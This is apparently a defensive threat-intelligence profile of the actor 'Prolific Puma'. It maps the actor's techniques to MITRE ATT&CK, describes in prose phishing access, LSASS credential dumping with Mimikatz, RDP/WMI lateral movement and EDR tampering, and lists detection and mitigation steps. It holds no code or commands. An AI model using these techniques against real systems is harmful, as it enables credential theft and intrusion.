Overview
Prolific Puma is a threat actor designation typically applied to a group using persistent and stealthy methods to compromise targeted systems. While not as widely attributed as other APTs, Prolific Puma has demonstrated capabilities in credential theft, privilege escalation, and lateral movement across enterprise environments.
Observed Tactics and Techniques
- T1059.001 – Command and Scripting Interpreter: PowerShell
- T1562.001 – Impair Defenses: Disable or Modify Tools
- T1003 – OS Credential Dumping
- T1078 – Valid Accounts
- T1021.001 – Remote Services: Remote Desktop Protocol
- T1047 – Windows Management Instrumentation
View this mapping using official
MITRE ATT&CK Navigator
Initial Access and Persistence
Prolific Puma typically gains initial access via phishing emails containing malicious attachments or links, followed by the deployment of living-off-the-land binaries (LOLBins) such as PowerShell or certutil. Persistence is maintained through registry modifications, scheduled tasks, and abuse of RDP credentials.
Credential Access and Lateral Movement
After establishing a foothold, the actor dumps credentials from LSASS using tools like Mimikatz or stealthier methods such as direct memory reads. They move laterally using valid admin credentials over RDP and WMI, often disabling logging or tampering with EDR systems along the way.
Detection and Mitigation
- Monitor for PowerShell execution with suspicious base64-encoded commands
- Alert on unusual RDP logon patterns and new service creations
- Use credential guard and limit admin privileges
- Ensure LSASS protection is enabled
- Disable or restrict the use of WMI and certutil for non-admin users
References
